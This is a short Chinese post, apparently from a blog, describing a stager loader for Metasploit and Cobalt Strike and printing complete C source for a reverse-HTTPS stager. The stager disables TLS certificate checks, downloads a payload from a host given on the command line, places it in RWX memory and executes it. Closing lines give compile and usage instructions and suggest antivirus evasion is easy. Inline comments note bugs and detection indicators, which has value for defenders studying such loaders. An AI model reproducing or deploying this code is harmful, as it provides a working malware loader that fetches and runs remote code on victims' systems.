一个msf和cobalt strike 都可以使用的loader

了解stager

借用msf的来说,看这 https://xz.aliyun.com/t/1709/
1.连接到处理程序
2.读取4字节长度
3.分配长度字节缓冲区
4.将其标记为可写和可执行(在Windows上,您需要VirtualProtect用于此)
5.将长度字节读入该缓冲区
6.跳转到缓冲区。在C中执行此操作的最简单方法是将其强制转换为函数指针并调用它。

通俗讲就是建立连接,接收dll,然后反射dll注入

msf与cobalt strike使用Reflective DLL Injection

附上一段https stager

来自:https://github.com/peacand/msf-av-escape/blob/master/reverse_https/main_https.c
#include <stdio.h>
#include <stdlib.h>
#include <windows.h>
#include <wininet.h>

/*
 * Flags passed to HttpOpenRequest (dwFlags).  The expansion is not wrapped
 * in parentheses, so it is only safe where it is used as a whole argument,
 * as it is in main() below.  INTERNET_FLAG_SECURE selects TLS, while the
 * two IGNORE_CERT_* bits make WinINet accept an expired certificate or a
 * name mismatch.
 */
#define HTTP_OPEN_FLAGS 0x80000000 | 0x04000000 | 0x00400000 | 0x00200000 | 0x00000200 | 0x00800000 | 0x00002000 | 0x00001000
/*
;0x80000000 | ; INTERNET_FLAG_RELOAD
;0x04000000 | ; INTERNET_NO_CACHE_WRITE
;0x00400000 | ; INTERNET_FLAG_KEEP_CONNECTION
;0x00200000 | ; INTERNET_FLAG_NO_AUTO_REDIRECT
;0x00000200 | ; INTERNET_FLAG_NO_UI
;0x00800000 | ; INTERNET_FLAG_SECURE
;0x00002000 | ; INTERNET_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 ; INTERNET_FLAG_IGNORE_CERT_CN_INVALID
*/

/*
 * Value written with InternetSetOption(INTERNET_OPTION_SECURITY_FLAGS).
 * Together the bits below turn off every certificate check WinINet would
 * otherwise perform (date, name, key usage, unknown CA, revocation), i.e.
 * the TLS connection is encrypted but the peer is not authenticated at all.
 * For a defender this combination of security flags is a strong tell that
 * the client is built to talk to a self-signed endpoint.
 */
#define OPTIONS_SECURITY_FLAGS 0x00003380
/*
;0x00002000 | ; SECURITY_FLAG_IGNORE_CERT_DATE_INVALID
;0x00001000 | ; SECURITY_FLAG_IGNORE_CERT_CN_INVALID
;0x00000200 | ; SECURITY_FLAG_IGNORE_WRONG_USAGE
;0x00000100 | ; SECURITY_FLAG_IGNORE_UNKNOWN_CA
;0x00000080 ; SECURITY_FLAG_IGNORE_REVOCATION
*/

/*
 * Program entry point: a reverse-HTTPS stager.
 *
 * Usage (from the surrounding text): <exe> <host> <port>.  argc is never
 * checked before argv[1] and argv[2] are used, and the port is parsed with
 * atoi(), so bad or missing arguments are not reported.
 *
 * Behaviour, in order: detach from the console, open a WinINet session,
 * issue GET /1f7MA over TLS with all certificate checks disabled (see
 * OPTIONS_SECURITY_FLAGS), commit one 0x00400000-byte region with
 * PAGE_EXECUTE_READWRITE, copy the whole HTTP response body into it, and
 * call the start of that region as a function.  No return value of any
 * WinINet call or of VirtualAlloc is checked.
 *
 * Observable pattern for detection/triage: FreeConsole(), a WinINet
 * handle with IGNORE_CERT_* / SECURITY_FLAG_IGNORE_* set, a single large
 * RWX VirtualAlloc, and a control transfer into freshly downloaded memory.
 *
 * Returns 0 only if the downloaded stage ever returns to this function.
 */
int main(int argc, char * argv[]) {
char * stage;
void(*stage_main)();
HINTERNET hInternet;
HINTERNET hHttpSession;
HINTERNET hHttpRequest;
int httpflags = OPTIONS_SECURITY_FLAGS;
int recv_tmp = 0, recv_tot = 0;
char *stage_index = NULL;

/* We dont want the console prompt at screen */
FreeConsole();

/* Even it its SSL encrypted, lets set a User Agent, looks better :-) */
/* Note: InternetOpen's first argument is the agent name itself, so the
   "User-Agent: " prefix in the literal becomes part of the advertised
   agent string rather than a header name. */
hInternet = InternetOpen("User-Agent: Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", 0, NULL, NULL, 0);
/* Host and port come straight from the command line; a NULL hInternet
   (failed InternetOpen) is not detected here. */
hHttpSession = InternetConnect(hInternet, argv[1], atoi(argv[2]), NULL, NULL, INTERNET_SERVICE_HTTP, 0, 0);
/* URL format is *important*, don't change it ! It tells what kind of payload (Native, Python, Java ..) is going to be injected afterwords */
hHttpRequest = HttpOpenRequest(hHttpSession, "GET", "/1f7MA", "HTTP/1.1", NULL, NULL, HTTP_OPEN_FLAGS, 0);
/* Set SSL options to the HTTP request */
/* 4 == sizeof httpflags; this is what disables peer authentication. */
InternetSetOption(hHttpRequest, INTERNET_OPTION_SECURITY_FLAGS, &httpflags, 4);
/* Result ignored: a failed request leaves the loop below reading nothing
   and the program still jumps into the (uninitialised) buffer. */
HttpSendRequest(hHttpRequest, NULL, 0, NULL, 0);

/* We got the payload, lets allocate a big chunk of memory in RWX to put the whole thing in */
/* Fixed 4 MiB, committed writable+executable in one call; NULL on failure
   is not checked. */
stage = VirtualAlloc(0, 0x00400000, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

/* Read the payload from the previous http request and put it in our buffer */
recv_tmp = 1;
recv_tot = 0;
stage_index = stage;

/* Reads 8192-byte chunks until InternetReadFile reports 0 bytes (or
   fails, in which case recv_tmp keeps whatever the API left in it).
   recv_tot is accumulated but never used, and neither it nor stage_index
   is compared against the 0x00400000 bytes that were allocated. */
while (recv_tmp > 0) {
InternetReadFile(hHttpRequest, stage_index, 8192, (PDWORD)&recv_tmp);
recv_tot += recv_tmp;
stage_index += recv_tmp;
}

/* Just jump at the beginning of the buffer */
/* Control transfer into downloaded data: the response body is treated as
   position-independent code starting at offset 0.  Everything after this
   call runs only if that code returns. */
stage_main = (void(*)())stage;
stage_main();

/* We dont have to care about it, but anyway .. */
/* hHttpRequest is never closed; only the session and root handles are. */
InternetCloseHandle(hHttpSession);
InternetCloseHandle(hInternet);

return 0;
}

自行编译
Usage:xxoo.exe ip port

什么,你说过不了杀毒? 自己动手做咯,又不难~